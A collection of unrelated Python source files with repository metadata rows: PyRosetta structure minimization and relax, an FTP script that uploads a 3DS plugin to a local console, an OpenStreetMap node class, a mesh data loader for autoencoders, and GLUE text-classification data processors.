def _worker(seq, constraint, sf, run_dir, pose_pool, pool_size, task_queue, mutex):
while True:
try:
idx = task_queue.get(block=False)
print("Start minimize %i ................." % idx)
mutex.acquire()
if len(pose_pool) < pool_size or np.random.random() < 0.1:
pose = _random_pose(seq, constraint)
else:
p = np.random.randint(len(pose_pool))
pose = pose_pool[p].clone()
_add_noise(pose)
mutex.release()
_minimize_step(sf, pose)
mutex.acquire()
pose_pool.append(pose)
if len(pose_pool) > pool_size:
pose_pool.sort(key=lambda x: score_it(sf, x))
del pose_pool[-1]
print("Score %i: %f" % (idx, score_it(sf, pose)))
mutex.release()
except queue.Empty:
break
def repeat_minimize(seq, constraints, sf, run_dir, n_workers, n_structs, n_iter):
pose_pool = []
mutex = threading.Lock()
q = queue.Queue()
for i in range(1, n_iter + 1):
q.put(i)
threads = []
for i in range(n_workers):
thread = threading.Thread(
target=_worker,
args=(seq, constraints, sf, run_dir, pose_pool, n_structs, q, mutex),
)
thread.start()
threads.append(thread)
for x in threads:
x.join()
pose_pool.sort(key=lambda x: score_it(sf, x))
return pose_pool
def relax(pose):
sf = create_score_function("ref2015")
sf.set_weight(rosetta.core.scoring.atom_pair_constraint, 5)
sf.set_weight(rosetta.core.scoring.dihedral_constraint, 1)
sf.set_weight(rosetta.core.scoring.angle_constraint, 1)
mmap = MoveMap()
mmap.set_bb(True)
mmap.set_chi(True)
mmap.set_jump(True)
relax = rosetta.protocols.relax.FastRelax()
relax.set_scorefxn(sf)
relax.max_iter(200)
relax.dualspace(True)
relax.set_movemap(mmap)
switch = SwitchResidueTypeSetMover("fa_standard")
switch.apply(pose)
relax.apply(pose)
| 27.91129 | 83 | 0.613118 | 480 | 3,461 | 4.225 | 0.30625 | 0.047337 | 0.011834 | 0.021696 | 0.248028 | 0.20858 | 0.127219 | 0.127219 | 0.127219 | 0.093688 | 0 | 0.034834 | 0.261774 | 3,461 | 123 | 84 | 28.138211 | 0.758904 | 0 | 0 | 0.176471 | 0 | 0 | 0.028027 | 0.006934 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.068627 | 0 | 0.176471 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4056293343dbab19d3e2d5e53479051955458c | 883 | py | Python | sendfile.py | ponpoko094/Colorful-MHX3gx | a795266f6872eee9eb2ea3dac2bc567cbb35dcfb | [
"MIT"
] | 4 | 2021-12-12T02:20:11.000Z | 2021-12-12T02:20:16.000Z | sendfile.py | ponpoko094/Colorful-MHX3gx | a795266f6872eee9eb2ea3dac2bc567cbb35dcfb | [
"MIT"
] | 2 | 2021-12-04T04:02:41.000Z | 2021-12-07T04:40:57.000Z | sendfile.py | ponpoko094/MHX3gx | 9abd1f9758013c81622334c88c799482cf79e4b2 | [
"MIT"
] | 2 | 2021-11-12T00:21:32.000Z | 2021-11-12T07:08:51.000Z | # -*- coding: utf-8 -*-
""" What is sendfile.py
This module is send 3gx to 3ds via FTP.
このモジュールはFTPで3gxを3dsに送信します。
"""
import ftplib
from ftplib import FTP
print("--------------------------")
print("Trying to Send the Plugin over FTP...")
get_ftp = FTP()
HOST_ADDRESS = "192.168.0.50"
PORT = 5000
TIME_OUT = 30.0
try:
get_ftp.connect(HOST_ADDRESS, PORT, TIME_OUT)
except ftplib.all_errors:
print("Failed to Connect on " + HOST_ADDRESS + " : " + str(PORT))
PATH = "luma/plugins/0004000000155400"
PLUGIN = "/Colorful-MHX3gx.3gx"
try:
print("Successfully Logged in " + HOST_ADDRESS + "\n")
print("Response : " + get_ftp.getwelcome())
get_ftp.login()
get_ftp.storbinary("STOR " + PATH + PLUGIN,
open(PLUGIN.replace("/", ""), "rb"))
print("Sending Plugin to " + PATH + "\n")
except ftplib.all_errors:
print("Login Failed!\n")
| 24.527778 | 69 | 0.628539 | 117 | 883 | 4.632479 | 0.538462 | 0.055351 | 0.055351 | 0.077491 | 0.095941 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054622 | 0.191393 | 883 | 35 | 70 | 25.228571 | 0.704482 | 0.123443 | 0 | 0.173913 | 0 | 0 | 0.296345 | 0.071802 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0.304348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb41685c8c33dcbafe597ec7414699791810848e | 2,888 | py | Python | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | 1 | 2021-07-21T13:51:18.000Z | 2021-07-21T13:51:18.000Z | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | null | null | null | src/models/node.py | Informatik-HS-KL/BEGGEL-SP-Map-Matcher-WS19 | c3532a86640631dcafa4e88d6efb32360f0faf0f | [
"Apache-2.0"
] | null | null | null | """
Description: A Node is basically representing an osm-node. But the class Node also contains useful observer functions,
for example to convert the geometry of a Node-Object into several geo-formats, and mutator functions.
@date: 10/25/2019
@author: Lukas Felzmann, Sebastian Leilich, Kai Plautz
"""
from .node_id import NodeId
from shapely.geometry import Point
class Node:
def __init__(self, node_id: NodeId, lat_lon: tuple):
"""
:param node_id: NodeId-Object
:param lat_lon: tuple(lat, lon)
"""
self._id = node_id
self._latLon = lat_lon
self._tags = {}
self._links = []
self._parent_links = []
def add_parent_link(self, link):
"""
:param link: Link Object
:return: None
"""
self._parent_links.append(link)
def get_parent_links(self):
"""
:return: list(Link-Object)
"""
return self._parent_links
def get_links(self):
"""
:return: list(link)
"""
return self._links
def get_id(self):
"""
:return: NodeId Object
"""
return self._id
def get_latlon(self):
"""
:return: tuple (lat, lon)
"""
return self._latLon
def get_lat(self):
"""
:return: float
"""
return self._latLon[0]
def get_lon(self):
"""
:return: float
"""
return self._latLon[1]
def set_tags(self, tags: dict):
"""
:param tags: dict
:return: None
"""
if tags is None:
self._tags = {}
else:
self._tags = tags
def get_tags(self):
"""
:return: dict
"""
return self._tags
def add_link(self, link):
"""
:param link: Link Model related to that Node
:return: None
"""
self._links.append(link)
def to_geojson(self):
"""
:return: dict
"""
data = {
"type": "Feature",
"geometry": {
"type": "Point",
"coordinates": [self.get_lon(), self.get_lat()]
},
"properties": {
"osm_node_id": self.get_osm_id(),
"geohash": self.get_geohash(),
"tags": self.get_tags()
}
}
return data
def to_wkt(self):
"""
:return: str
"""
lat, lon = self.get_latlon()
return Point(lon, lat).wkt
def __repr__(self):
return "Node: <id: %s> <latLon: %s>" % (self._id, self._latLon)
def get_osm_id(self):
"""
:return: int
"""
return self.get_id().get_osm_id()
def get_geohash(self):
"""
:return: str
"""
return self.get_id().get_geohash()
| 22.215385 | 119 | 0.496191 | 315 | 2,888 | 4.336508 | 0.273016 | 0.087848 | 0.021962 | 0.026354 | 0.142021 | 0.081991 | 0 | 0 | 0 | 0 | 0 | 0.005577 | 0.379155 | 2,888 | 129 | 120 | 22.387597 | 0.756274 | 0.235111 | 0 | 0.036364 | 0 | 0 | 0.053728 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.290909 | false | 0 | 0.036364 | 0.018182 | 0.563636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
bb41c4d99b6843964899cf16c40a4d079031229f | 5,972 | py | Python | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null | UnstructuredMesh/DataLoaderUnstructuredMesh.py | MaximeRedstone/UnstructuredCAE-DA | b54bd53540c11aa1b70e5160751905141f463217 | [
"MIT"
] | null | null | null |
""" Data Loader for CAEs on Unstructured Meshes """
import sys, os, pickle, argparse
import numpy as np
from tabulate import tabulate
from datetime import datetime
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn.cluster import DBSCAN
from scipy.spatial import distance_matrix
from scipy.spatial.distance import cdist
from UnstructuredCAEDA.train import TrainAE
from UnstructuredCAEDA.VarDA import BatchDA
from UnstructuredCAEDA.data import GetData
from UnstructuredCAEDA.settings.models.CLIC import CLIC
from UnstructuredCAEDA.fluidity import vtktools
from UnstructuredCAEDA.UnstructuredMesh.Localisation import *
from UnstructuredCAEDA.UnstructuredMesh.HelpersUnstructuredMesh import *
class DataLoaderUnstructuredMesh(GetData):
""" Class to load data from data files (.vtu) for AEs Training or Data Assimilation
Abreviations: fp = file path
v = vertices
f = faces
ug = unstructured grid """
def __init__(self):
pass
def get_X(self, settings):
""" Args: settings: (CLICUnstructuredMesh class)
Returns: np.array of dimensions time steps x localised points """
fps = DataLoaderUnstructuredMesh.get_sorted_fps_U(settings.getDataDir())
filepath = getXFilePath(settings)
filepathIdxMatch = getMeshToNetworkIdxMatchingLocations(settings)
filepathIdxAll = getMeshToNetworkIdxLocations(settings)
filepathIdxOverlap = getIdxOverlap(settings)
if os.path.isfile(filepath):
print("Reading pickle file: ", filepath)
with open(filepath, "rb") as f:
X = pickle.load(f)
if settings.CLIC_UNSTRUCTURED: #Only read if localisation took place first
with open(filepathIdxMatch, "rb") as f:
idxDict = pickle.load(f)
settings.setMatchIdxMeshToIdxNetwork(idxDict)
with open(filepathIdxAll, "rb") as f:
idxDict = pickle.load(f)
settings.setIdxMeshToIdxNetwork(idxDict)
with open(filepathIdxOverlap, "rb") as f:
idxOverlap = pickle.load(f)
settings.setOverlappingRegions(idxOverlap)
else:
print("Creating pickle file for percentage: ", settings.getPercentOfVertices())
X = Localiser.createX(fps, settings)
outfile = open(filepath, 'wb')
pickle.dump(X, outfile)
outfile.close()
print("Shape read X: ", np.shape(X))
networkInput= DataLoaderUnstructuredMesh.toNetworkSpace(X, settings)
return networkInput
@staticmethod
def get_sorted_fps_U(data_dir):
""" Creates and returns list of .vtu filepaths sorted according
to timestamp in name.
Input files in data_dir must be of the
form LSBU_<TIMESTEP INDEX>_<SUBDOMAIN>.vtu """
fps = [f for f in os.listdir(data_dir) if not f.startswith('.')]
#Extract Subdomain number from data_dir
_, subdomain = data_dir.split("_") #split returns ["LSBU", "<Subdomain>"]
subdomain.replace("/", "")
#Extract index of timestep from file name
idx_fps = []
for fp in fps:
if not fp.startswith("."):
lsbu, timestep, extension = fp.split("_")
idx = int(timestep)
idx_fps.append(idx)
#sort by timestep
assert len(idx_fps) == len(fps)
zipped_pairs = zip(idx_fps, fps)
fps_sorted = [x for _, x in sorted(zipped_pairs)]
#add absolute path
fps_sorted = [data_dir + x for x in fps_sorted]
return fps_sorted
@staticmethod
def toNetworkSpace(X, settings):
""" Convert X to appropriate shape for AEs """
if settings.getDim() == 1:
networkInput = X
elif settings.getDim() == 2:
networkInput = DataLoaderUnstructuredMesh.reshape(X)
else:
raise NotImplementedError("Converting to network space only works for specific cases (see function description)")
return networkInput
# DEPRECATED CODE
# Below are functions used when experimenting with Tucodec 2D model that required minimum dimensions
# of 90 x 92 for size of convolution kernels to be smaller than data input size at all layers
@staticmethod
def reshape(X):
""" Reshape X of shape Timesteps x Scalars to Timesteps x nx x ny """
nbTimeSteps, nbVertices = np.shape(X)[0], np.shape(X)[1]
newshape, idxEnd = DataLoaderUnstructuredMesh.setNetworkSpace(nbVertices, np.ndim(X))
print("X entering network reshaping len = {} when will become = {}".format(nbVertices, idxEnd))
Xidx = []
for timestep in X:
timestep = timestep[:idxEnd]
Xidx.append(timestep)
for idx in range(nbTimeSteps):
oneTimestep = Xidx[idx]
oneTimestepReshaped = np.reshape(oneTimestep, newshape, order='F')
if idx == 0:
#fix length of vectors and initialize the output array:
nsize = np.shape(oneTimestepReshaped)
size = (nbTimeSteps,) + nsize
output = np.zeros(size)
output[idx] = oneTimestepReshaped
print("In network space, Xreshaped = ", np.shape(output))
return output
    @staticmethod
    def setNetworkSpace(n, dim):
        if dim not in [2]:
            raise NotImplementedError("function can only reshape 2D inputs")
        nbOfVertices = int(n - (n % 10))
        y = 90  # minimum height required by the Tucodec 2D model
        x, y = DataLoaderUnstructuredMesh.getXfromY(nbOfVertices, y)
        newshape = x, y
        idxEnd = x * y
        return newshape, idxEnd
    @staticmethod
    def getXfromY(n, ymin):
        xres = n // ymin
        if xres % 2 != 0:
            xres = xres - 1
        return xres, ymin
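The timestep sort at the top of this block can be exercised in isolation. This sketch assumes file names of the form `lsbu_<timestep>_<suffix>` (inferred from the three-way `split("_")` unpacking); real file names may differ:

```python
# Standalone sketch of the timestep-based sorting above. The
# "lsbu_<timestep>_<suffix>" naming is an assumption, not confirmed by the source.
def sort_by_timestep(fps, data_dir):
    fps = [fp for fp in fps if not fp.startswith(".")]  # skip hidden files
    idx_fps = [int(fp.split("_")[1]) for fp in fps]     # numeric sort key
    fps_sorted = [x for _, x in sorted(zip(idx_fps, fps))]
    return [data_dir + x for x in fps_sorted]

files = ["lsbu_10_field.vtu", ".DS_Store", "lsbu_2_field.vtu", "lsbu_1_field.vtu"]
print(sort_by_timestep(files, "/data/"))
```

Sorting on the integer key avoids the lexicographic trap where `"10"` sorts before `"2"`.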
bb41f1bb72ae99e6bb69d3bb195a661a2dbb73cb | 18,832 | py | Python | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 55 | 2021-12-10T08:47:06.000Z | 2022-03-28T09:02:15.000Z | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 106 | 2021-11-03T05:16:45.000Z | 2022-03-31T06:16:23.000Z | projects/text_classification/dataset/utils_glue.py | khloe-zhang/libai | 1787a6d920b09d3aed8b04cecb84535612f388b8 | [
"Apache-2.0"
] | 13 | 2021-12-29T08:12:08.000Z | 2022-03-28T06:59:45.000Z |
# coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os

from .utils import DataProcessor, EncodePattern, InputExample, InputFeatures

logger = logging.getLogger(__name__)
def glue_convert_examples_to_features(
    examples,
    tokenizer,
    max_length,
    task=None,
    pattern=EncodePattern.bert_pattern,
    label_list=None,
    output_mode=None,
):
    if task is not None:
        processor = glue_processors[task]()
        if label_list is None:
            label_list = processor.get_labels()
            logger.info(f"Using label list {label_list} for task {task}")
        if output_mode is None:
            output_mode = glue_output_modes[task]
            logger.info(f"Using output mode {output_mode} for task {task}")
    label_map = {label: i for i, label in enumerate(label_list)}
    start_token = [] if tokenizer.start_token is None else [tokenizer.start_token]
    end_token = [] if tokenizer.end_token is None else [tokenizer.end_token]
    pad_id = tokenizer.pad_token_id
    # Number of special tokens added for (single, pair) inputs in each encoding pattern
    if pattern == EncodePattern.bert_pattern:
        added_special_tokens = [2, 3]
    elif pattern == EncodePattern.roberta_pattern:
        added_special_tokens = [2, 4]
    else:
        raise KeyError("pattern is not a valid EncodePattern")
    features = []
    for (ex_index, example) in enumerate(examples):
        if ex_index % 10000 == 0:
            logger.info("Writing example %d of %d" % (ex_index, len(examples)))
        tokens_a = tokenizer.tokenize(example.text_a)
        tokens_b = None
        if example.text_b:
            tokens_b = tokenizer.tokenize(example.text_b)
            _truncate_seq_pair(tokens_a, tokens_b, max_length - added_special_tokens[1])
        else:
            if len(tokens_a) > max_length - added_special_tokens[0]:
                tokens_a = tokens_a[: (max_length - added_special_tokens[0])]
        if pattern is EncodePattern.bert_pattern:
            tokens = start_token + tokens_a + end_token
            token_type_ids = [0] * len(tokens)
            if tokens_b:
                tokens += tokens_b + end_token
                token_type_ids += [1] * (len(tokens) - len(token_type_ids))
        elif pattern is EncodePattern.roberta_pattern:
            tokens = start_token + tokens_a + end_token
            token_type_ids = [0] * len(tokens)
            if tokens_b:
                tokens += end_token + tokens_b + end_token
                token_type_ids += [1] * (len(tokens) - len(token_type_ids))
        else:
            raise KeyError("pattern is not a valid EncodePattern")
        input_ids = tokenizer.convert_tokens_to_ids(tokens)
        attention_mask = [1] * len(input_ids)
        padding_length = max_length - len(input_ids)
        input_ids = input_ids + ([pad_id] * padding_length)
        attention_mask = attention_mask + ([0] * padding_length)
        token_type_ids = token_type_ids + ([0] * padding_length)
        label = None
        if example.label is not None:
            if output_mode == "classification":
                label = label_map[example.label]
            elif output_mode == "regression":
                label = float(example.label)
        if ex_index < 5:
            logger.info("*** Example ***")
            logger.info("guid: %s" % (example.guid))
            logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
            logger.info("attention_mask: %s" % " ".join([str(x) for x in attention_mask]))
            logger.info("token_type_ids: %s" % " ".join([str(x) for x in token_type_ids]))
            logger.info("label: %s (id = %s)" % (example.label, label))
        features.append(
            InputFeatures(
                input_ids=input_ids,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids,
                labels=label,
            )
        )
    return features
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
    """Truncates a sequence pair in place so the total length is at most
    max_length, always removing tokens from the end of the longer sequence."""
    while True:
        total_length = len(tokens_a) + len(tokens_b)
        if total_length <= max_length:
            break
        if len(tokens_a) > len(tokens_b):
            tokens_a.pop()
        else:
            tokens_b.pop()
class MrpcProcessor(DataProcessor):
    """Processor for the MRPC data set (GLUE version).

    Sentence pair classification task.
    Determine whether the two sentences have the same meaning.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{i}"
            text_a = line[3]
            text_b = line[4]
            label = None if set_type == "test" else line[0]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples
class MnliProcessor(DataProcessor):
    """Processor for the MultiNLI data set (GLUE version).

    Sentence pair classification task.
    Given a premise sentence and a hypothesis sentence,
    the task is to predict whether the premise entails the hypothesis (entailment),
    contradicts the hypothesis (contradiction), or neither (neutral).
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "dev_matched.tsv")), "dev_matched"
        )

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test_matched.tsv")), "test_matched"
        )

    def get_labels(self):
        """See base class."""
        return ["contradiction", "entailment", "neutral"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            text_a = line[8]
            text_b = line[9]
            label = None if set_type.startswith("test") else line[-1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples


class MnliMismatchedProcessor(MnliProcessor):
    """Processor for the MultiNLI Mismatched data set (GLUE version)."""

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "dev_mismatched.tsv")),
            "dev_mismatched",
        )

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test_mismatched.tsv")),
            "test_mismatched",
        )
class ColaProcessor(DataProcessor):
    """Processor for the CoLA data set (GLUE version).

    Single sentence classification task.
    Each example is a sequence of words annotated with whether it is a grammatical English sentence.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        test_mode = set_type == "test"
        if test_mode:
            lines = lines[1:]
        text_index = 1 if test_mode else 3
        examples = []
        for (i, line) in enumerate(lines):
            guid = f"{set_type}-{i}"
            text_a = line[text_index]
            label = None if test_mode else line[1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
        return examples


class Sst2Processor(DataProcessor):
    """Processor for the SST-2 data set (GLUE version).

    Single sentence classification task.
    The task is to predict the sentiment of a given sentence.
    We use the two-way (positive/negative) class split, and use only sentence-level labels.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        text_index = 1 if set_type == "test" else 0
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{i}"
            text_a = line[text_index]
            label = None if set_type == "test" else line[1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))
        return examples
class StsbProcessor(DataProcessor):
    """Processor for the STS-B data set (GLUE version).

    Sentence pair regression task.
    The task is to predict the similarity score of two sentences.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return [None]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            text_a = line[7]
            text_b = line[8]
            label = None if set_type == "test" else line[-1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples


class QqpProcessor(DataProcessor):
    """Processor for the QQP data set (GLUE version).

    Sentence pair classification task.
    The task is to determine whether a pair of questions are semantically equivalent.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        test_mode = set_type == "test"
        q1_index = 1 if test_mode else 3
        q2_index = 2 if test_mode else 4
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            try:
                text_a = line[q1_index]
                text_b = line[q2_index]
                label = None if test_mode else line[5]
            except IndexError:
                continue
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples
class QnliProcessor(DataProcessor):
    """Processor for the QNLI data set (GLUE version).

    Sentence pair classification task.
    The task is to determine whether the context sentence contains the answer to the question.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["entailment", "not_entailment"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            text_a = line[1]
            text_b = line[2]
            label = None if set_type == "test" else line[-1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples


class RteProcessor(DataProcessor):
    """Processor for the RTE data set (GLUE version).

    Sentence pair classification task: Recognizing Textual Entailment.
    Predict whether the relation between the two sentences is entailment
    or not_entailment (covering both neutral and contradiction).
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["entailment", "not_entailment"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            text_a = line[1]
            text_b = line[2]
            label = None if set_type == "test" else line[-1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples
class WnliProcessor(DataProcessor):
    """Processor for the WNLI data set (GLUE version).

    Sentence pair classification task.
    The task is to predict if the sentence with the pronoun substituted is entailed
    by the original sentence.
    """

    def get_train_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")

    def get_dev_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

    def get_labels(self):
        """See base class."""
        return ["0", "1"]

    def _create_examples(self, lines, set_type):
        """Creates examples for the training, dev and test sets."""
        examples = []
        for (i, line) in enumerate(lines):
            if i == 0:
                continue
            guid = f"{set_type}-{line[0]}"
            text_a = line[1]
            text_b = line[2]
            label = None if set_type == "test" else line[-1]
            examples.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
        return examples
glue_tasks_num_labels = {
    "cola": 2,
    "mnli": 3,
    "mrpc": 2,
    "sst-2": 2,
    "sts-b": 1,
    "qqp": 2,
    "qnli": 2,
    "rte": 2,
    "wnli": 2,
}

glue_processors = {
    "cola": ColaProcessor,
    "mnli": MnliProcessor,
    "mnli-mm": MnliMismatchedProcessor,
    "mrpc": MrpcProcessor,
    "sst-2": Sst2Processor,
    "sts-b": StsbProcessor,
    "qqp": QqpProcessor,
    "qnli": QnliProcessor,
    "rte": RteProcessor,
    "wnli": WnliProcessor,
}

glue_output_modes = {
    "cola": "classification",
    "mnli": "classification",
    "mnli-mm": "classification",
    "mrpc": "classification",
    "sst-2": "classification",
    "sts-b": "regression",
    "qqp": "classification",
    "qnli": "classification",
    "rte": "classification",
    "wnli": "classification",
}
| 35.802281 | 100 | 0.616769 | 2,461 | 18,832 | 4.509549 | 0.106461 | 0.072445 | 0.041088 | 0.061633 | 0.640656 | 0.623356 | 0.612723 | 0.602451 | 0.561543 | 0.546044 | 0 | 0.007414 | 0.262266 | 18,832 | 525 | 101 | 35.870476 | 0.791406 | 0.18511 | 0 | 0.522659 | 0 | 0 | 0.08558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148036 | false | 0 | 0.009063 | 0 | 0.332326 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
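The longest-first truncation used by `_truncate_seq_pair` above can be demonstrated standalone; this sketch re-implements the same loop outside the module:

```python
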